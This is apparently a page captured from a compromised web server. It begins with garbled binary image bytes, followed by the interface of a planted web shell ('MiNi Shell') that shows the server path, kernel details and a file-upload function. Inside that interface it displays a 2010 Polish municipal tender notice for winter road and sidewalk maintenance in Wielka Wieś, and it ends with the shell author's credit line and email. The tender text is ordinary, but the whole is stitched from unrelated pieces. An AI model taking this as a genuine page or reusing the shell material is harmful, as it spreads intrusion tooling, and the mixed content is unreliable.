JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100928/309960-N-2010.html

<p class="kh_header"><b>Wielka Wieś: Prowadzenie zimowego utrzymania pasa drogowego dróg gminnych w sezonie zimowym 2010/11 na terenie Gminy Wielka Wieś</b><br>
<b>Numer ogłoszenia: 309960 - 2010; data zamieszczenia: 28.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielka Wieś , ul. Wesoła 48, 32-089 Wielka Wieś, woj. małopolskie, tel. 012 4191704, faks 012 4191705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielka-wies.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zimowego utrzymania pasa drogowego dróg gminnych w sezonie zimowym 2010/11 na terenie Gminy Wielka Wieś.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Część I
Prowadzenie zimowego utrzymania pasa jezdnego dróg gminnych w sezonie zimowym 2010/11 na terenie Gminy Wielka Wieś,
którego celem jest zapewnienie przejezdności i płynności ruchu drogowego na drogach będących w zarządzie Gminy Wielka Wieś w okresie zimowym tj od dnia 01.11.2010r do dnia 31.03.2011r a w szczególności w czasie opadów śniegu, deszczu ze śniegiem lub gołoledzi .
1.	Zakres usługi w szczególności obejmuje:
	przygotowanie sprzętu i materiałów niezbędnych do realizacji zadania poprzez: zakup, najem, magazynowanie, ładowanie i transport,
	odśnieżanie jezdni i poboczy oraz obiektów towarzyszących- zatok autobusowych,
	usuwanie śliskości zimowej przez posypywanie nawierzchni drogi materiałami wykorzystywanymi do ich posypywania w czasie zimowego utrzymywania dróg,
	dyżur sprzętu,
	przekazywanie informacji o stanie dróg w formie meldunków do Zamawiającego 
	zapewnienie łączności z pracującym lub dyżurującym sprzętem,
2.	Drogi muszą zostać odśnieżone w sposób nie utrudniający włączenia się do odśnieżanej drogi z dróg przyległych w rejonie skrzyżowań 
Wykonawca przystępuje do odśnieżania lub posypywania nawierzchni drogi celem usunięcia jej śliskości w ciągu 1 godziny od zgłoszenia przez Gminę o takiej potrzebie lecz nie później niż w czasie do 2 godzin od wystąpienia zjawiska utrudniającego ruch na drodze. 
W przypadku dróg nie objętych ryczałtem, Wykonawca podejmuje zimowe ich utrzymanie po telefonicznym zgłoszeniu przez Zamawiającego. 
Do likwidacji oblodzeń Wykonawca posypuje nawierzchnię drogi materiałami do posypywania dróg dopuszczonymi do ogólnego stosowania.
Materiał ten winien posiadać stosowne atesty potwierdzające jego przydatność do wykonania przedmiotu zamówienia .
Wymagania dla materiałów do zwalczania śliskości zimowej:
Użyte materiały winny być zgodne z Rozporządzeniem Ministra Środowiska z dnia 27 października 2005 roku w sprawie rodzajów i warunków stosowania środków, jakie mogą być używane na drogach publicznych oraz ulicach i placach. (Dz. U z dnia 24 listopada 2005 roku Nr 230 poz. 1960 z póżn. zm.)
Stosować do uszorstnienia lodu, zlodowaciałego i ubitego śniegu:
- piasek o uziarnieniu do 1mm, 
- kruszywo naturalne lub sztuczne o uziarnieniu do 4 mm;
- kruszywo kamienne łamane o uziarnieniu 2-4 mm, 
Kruszywo stosowane do uszorstnienia nawierzchni nie powinno być łamliwe, nie powinno zawierać zanieczyszczeń ilastych, gliniastych. Jednorodność uziarnienia kruszywa zapewnia większą równomierność pokrycia drogi podczas posypywania.
Nie dopuszcza się stosowania materiałów uszorstniajacych nienormatywnych w tym materiałów stanowiących odpad w rozumieniu ustawy o odpadach.
Wykonawca ponosi pełną odpowiedzialność za szkody w tym wypadki i kolizje drogowe spowodowane zaniechaniem robót lub na skutek niedostatecznego lub niezgodnego z obowiązującymi przepisami wykonywania robót przy zimowym utrzymaniu dróg. Wykonawca wykupi stosowną polisę ubezpieczeniową na kwotę nie mniejszą niż 800 tys zł jako zabezpieczenie dla ewentualnych roszczeń tytułem poniesionych strat przez użytkowników dróg gminnych.
W celu wykonania zamówienia Wykonawca jest zobowiązany do posiadania takiej ilości sprzętu aby móc prowadzić akcję zimową równocześnie  na terenie całej gminy oraz bazy  sprzętowo- materiałowej zlokalizowanej na terenie Gminy Wielka Wieś . Stosowny sprzęt nie powinien powodować uszkodzeń  nawierzchni dróg oraz nie powinien stwarzać  zagrożenia dla użytkowników.
2.1.	W okresie od 01.11.2010r. do 30.11.2010r oraz od dnia 01.03.2011r do dnia 31.03.2011 r płatne za 1 km odśnieżania brutto- po telefonicznym zgłoszeniu zlecającego:
	 38 km dróg utrzymanych całodobowo zgodnie z 3 standardem utrzymania dróg wg Zarządzenia nr 46 Ministra Transportu i Gospodarki Morskiej z dnia 25.10.1994 roku 
Standard 3 utrzymania dróg obejmuje:
- posypywanie jezdni na : skrzyżowaniach dróg, odcinkach o pochyleniu powyżej 4%, przystankach autobusowych, innych miejscach ustalonych przez zarząd drogi. Dopuszcza się występowanie śniegu zajeżdżonego, języków śnieżnych. Zaspy śnieżne winny zostać usunięte do 8 godzin. Dopuszcza się przerwy w komunikacji do 8 godzin.
	do 30 km dróg utrzymywanych całodobowo zgodnie z 4 standardem utrzymania dróg wg w/w zarządzenia
Standard 4 utrzymania dróg obejmuje:
- odśnieżanie jezdni, w miejscach zasp odśnieżony winien zostać  co najmniej jeden pas ruchu z wykonaniem mijanek. Jezdnia posypywana winna zostać na odcinkach decydujących o możliwości ruchu. Dopuszcza się przerwy w komunikacji do 24 godzin.
2.2.	W okresie od 01.12.2010 do 28.02.2011r: 
a-   38 km dróg utrzymanych całodobowo zgodnie z 3 standardem utrzymania dróg wg Zarządzenia nr 46 Ministra Transportu i Gospodarki Morskiej z dnia 25.10.1994 roku- płatne ryczałtowo
b-   do 40 km dróg utrzymywanych całodobowo zgodnie z 4 standardem utrzymania dróg wg w/w zarządzenia płatne za 1 km odśnieżania brutto po telefonicznym zgłoszeniu zlecającego
3.	Wynagrodzenie miesięczne ryczałtowe wypłacane będzie Wykonawcy za wykonanie zamówienia, o którym mowa w punkcie 2.2 a). Zakres dróg objętych tym zamówieniem określa szczegółowo załącznik do niniejszego SIWZ tj. mapa z zaznaczoną siecią dróg objętych ryczałtowym utrzymaniem zimowym. 
4.	O wyjeździe sprzętu na drogi decyduje Zamawiający po wcześniejszym przeanalizowaniu konieczności rozpoczęcia akcji zimowego utrzymania dróg.
5.	Ilość dróg objęta przetargiem jest wielkością orientacyjną (przewidywaną) i może ulec zmniejszeniu lub zwiększeniu w zależności od potrzeb i wysokości środków posiadanych przez Zamawiającego.
6.	Zamawiający nie pokrywa kosztów dojazdu pracowników, sprzętu i materiałów eksploatacyjnych na teren Gminy Wielka Wieś, a jedynie cenę ryczałtową za wykonanie zimowego utrzymania dróg.


Część II
Zimowe utrzymanie chodników, ciągów pieszych, alejek i parkingów w sezonie zimowym 2010/11 na terenie Gminy Wielka Wieś,
którego celem jest zapewnienie bezpieczeństwa, płynności ruchu na ciągach pieszych  będących w zarządzie Gminy Wielka Wieś w okresie zimowym tj. od dnia 01.11.2010r do dnia 31.03.2011r a w szczególności w czasie opadów śniegu, deszczu ze śniegiem lub gołoledzi .Ogólna powierzchnia objęta zimowym utrzymaniem -  27.718,92 m2 (18.479,28 mb x 1,50m szerokości)
1.   Zakres usługi w szczególności obejmuje:
Zimowe utrzymanie powierzchni objętej przedmiotem zamówienia - codzienne łącznie z niedzielami i świętami (w sytuacji występowania opadów śniegu, gołoledzi, lodowicy, śliskości pośniegowej, itp.) polega na:
	Odśnieżaniu i posypaniu piaskiem lub kruszywem naturalnym bądź sztucznym (w przypadku powstania śliskości pośniegowej odkucie lodu) chodników, ciągów pieszych, 
	Chodniki winny być odśnieżane i posypywane na całej szerokości, dopuszcza się cienką warstwę śniegu zajeżdżonego
	Odśnieżanie musi być podjęte w takim czasie, aby luźny śnieg nie leżał dłużej niż 4 godziny, błoto pośniegowe 6 godzin
	W przypadku wystąpienia ciągłych (nieprzerwanych) opadów śniegu odśnieżanie ciągów pieszych winno być prowadzone w taki sposób, aby była zapewniona drożność i bezpieczeństwo komunikacyjne na terenach objętych akcją.
	Odśnieżanie należy prowadzić mechanicznie przez zastosowanie lekkiego pługu chodnikowego lub ręcznie. Zastosowana technologia nie może powodować uszkodzeń nawierzchni ciągów pieszych krawężników, obrzeży  oraz uzbrojenia przebiegającego pod chodnikami
	Śliskość musi być  likwidowana poprzez posypywanie oczyszczonej  ze śniegu powierzchni piaskiem
2.	Użyte materiały do zwalczania śliskości zimowej: Użyte materiały winny być zgodne z Rozporządzeniem Ministra Środowiska z dnia 27 października 2005 roku w sprawie rodzajów i warunków stosowania środków, jakie mogą być używane na drogach publicznych oraz ulicach i placach. (Dz. U z dnia 24 listopada 2005 roku Nr 230 poz. 1960 z póżn. zm.)
Stosować do uszorstnienia lodu, zlodowaciałego i ubitego śniegu:
- piasek o uziarnieniu do 1mm, 
- kruszywo naturalne lub sztuczne o uziarnieniu do 4 mm;
- kruszywo kamienne łamane o uziarnieniu 2-4 mm, 
Kruszywo stosowane do uszorstnienia nawierzchni nie powinno być łamliwe, nie powinno zawierać zanieczyszczeń ilastych, gliniastych. Jednorodność uziarnienia kruszywa zapewnia większą równomierność pokrycia chodników podczas posypywania. 
Materiał ten winien posiadać stosowne atesty potwierdzające jego przydatność do wykonania przedmiotu zamówienia .
3.	Zamawiający narzuca następujące standardy zimowego utrzymania: obiekty ujęte w przedmiocie zamówienia w przypadkach konieczności winny zostać odśnieżone i posypane  do godziny 700  o krotności przeprowadzenia akcji odśnieżania lub zlikwidowania śliskości ciągu pieszego decydować będzie Wykonawca . Wykonawca ponosi pełną odpowiedzialność za szkody (wypadki i kolizje ) spowodowane zaniechaniem robót lub na skutek niedostatecznego lub niezgodnego z obowiązującymi przepisami wykonywania robót przy zimowym utrzymaniu ciągów pieszych. Wykonawca wykupi stosowną polisę ubezpieczeniową na kwotę nie mniejszą niż 100 tys. złotych.
4.	W przypadku wystąpienia opadów ciągłych musi być zachowana możliwość bezpiecznego poruszania się po ciągach pieszych przez cały dzień.
5.	Szczegółowy wykaz ciągów pieszych objętych przedmiotem zamówienia 
(Ciągi piesze o szerokości ok 1,50m )
A)Giebułtów  droga K601447 - 1.786, 14 mb
B) Czajowice droga K601442 - 1.593,00 mb
C) Bębło         droga K601474 - 1.475,00 mb
D)Modlnica    droga K601479 - 1.510,14 mb
E)Wielka Wieś droga K601448- 1.231,00 mb
F) Wierzchowie droga K601461 -  740 mb
G)Wielka Wieś droga K601460 - 170 mb
H) Modlniczka droga K601445+centrum wsi - 2.350,00mb
I) Tomaszowice - Modlnica droga K 601444 - 3.894,00mb
J) Wielka Wieś droga K601443 + ul. Słoneczna - 2.750 mb- 
K)Modlnica ul. Jurajska -980mb
6.	Zamawiający zastrzega sobie możliwość zmiany powyższego zakresu zamówienia lub zaniechania odśnieżania ciągów pieszych jednakże może to mieć miejsce jedynie po pisemnym powiadomieniu Wykonawcy o tym fakcie.
7.	Wykonawca musi być dyspozycyjny całą dobę oraz musi posiadać łączność z operatorami  sprzętu .
8. Obowiązki wykonawcy:
	zorganizowanie dyżurów dyspozytorskich celem zapewnienia koordynacji i nadzoru akcji zimowej
	zabezpieczenie sprzętu gwarantującego bezawaryjne odśnieżanie i posypywanie ciągów pieszych
	rozpoczęcie usuwania śliskości natychmiast po jej wystąpieniu
	rozpoczęcie odśnieżania w ciągu 1 godziny od wystąpienia opadów śniegu lub powstania gołoledzi
	zabezpieczenie bazy materiałowej niezbędnej do przeprowadzenia akcji zima
	pozyskiwanie  ze stacji meteorologicznej codziennych informacji o stanie pogody i przekazanie informacji do Zamawiającego.
	wyposażenie pojazdów biorących udział w akcji zimowej w urządzenia wymagane przepisami ustawy Prawo o ruchu drogowym.
	Zakup piasku lub kruszywa dokonuje Wykonawca na swój koszt
	Składowanie piasku do akcji zima . 
9. Sposób rozliczania za utrzymanie chodników, ciągów pieszych, alejek i parkingów w sezonie zimowym 2010/11 na terenie Gminy Wielka Wie,:
9.1.	W okresie od 01.11.2010r. do 30.11.2010r oraz od dnia 01.03.2011 r do dnia 31.03.2011 r płatne za 1 km odśnieżania brutto- po telefonicznym zgłoszeniu Zlecającego:
9.2.	W okresie od 01.12.2010 do 28.02.2011r: - płatne ryczałtowo
10.	Wynagrodzenie miesięczne ryczałtowe wypłacane będzie Wykonawcy za wykonanie zamówienia, o którym mowa w punkcie 9.2. Zakres chodników objętych tym zamówieniem został określony w powyższym pkt. 5 części II niniejszej SIWZ 
11.	O konieczności odśnieżania ciągów pieszych w okresie o którym mowa w pkt 9.1 decyduje Zamawiający po wcześniejszym przeanalizowaniu konieczności rozpoczęcia akcji zimowego utrzymania dróg. Koszt utrzymania 1km chodnika obejmuje całodobowe utrzymanie ciągu pieszego na odcinku wskazanym przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6, 90.21.30.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wadium w kwocie 10.000,00 zł ( dziesięc tysiecy złotych )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 2  usługami  odpowiadającymi  swoim rodzajem  usłudze  stanowiącej  przedmiot zamówienia  o wartości 400 tyś. każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykażę, że dysponuje min. 3 samochodami ciężarowymi o dopuszczalnej masie całkowitej  do 13 t z napędem 4x4 z pługiem i piaskarką, 3 ciągnikami 4 x4 z pługiem i rozrzutnikiem o mocy min. 80 kM.,  2 koparko-spycharkami  i pługiem wirnikowym, samochodem patrolowym 4x4 oraz 2 mikrociągnikami 4x4 z pługiem i piaskarką.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże dysponowanie minimum: 5 osobami posiadającymi uprawnienia do kierowania ruchem drogowym i 4 osobami posiadającymi uprawnienia do prowadzenia pojazdów przeznaczonych do mechanicznego odśnieżania dróg  odśnieżarkami mechanicznymi zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20.09.2001r. w sprawie bezpieczeństwa i higieny pracy( Dz. U. nr 118, poz.1263) Wykonawca  przed podpisaniem umowy na wykonanie zamówienia przedłoży kserokopie powyższych uprawnień.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zawartość oferty.
Formularz OFERTA - załącznik nr 1 do SIWZ.
Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów dołączonych do oferty.
Oświadczenia i dokumenty wymagane postanowieniami rozdziału VIII SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany umowy o zamówienie w przypadku zmiany stawki podatku VAT.
Dopuszcza się zmianę osob upowaznionychdo dokonywania czynności , zmian danych teleadresowych pod warunkiem wystapienia takich zmian z przyczyn organizacyjnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wielka-wies.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wielka Wieś, 32-089 Wielka Wieś, ul. Wesoła 48.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2010 godzina 09:30, miejsce: Urząd Gminy Wielka Wieś, 32-089 Wielka Wieś, ul. Wesoła 48, Biuro Obsługi Interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com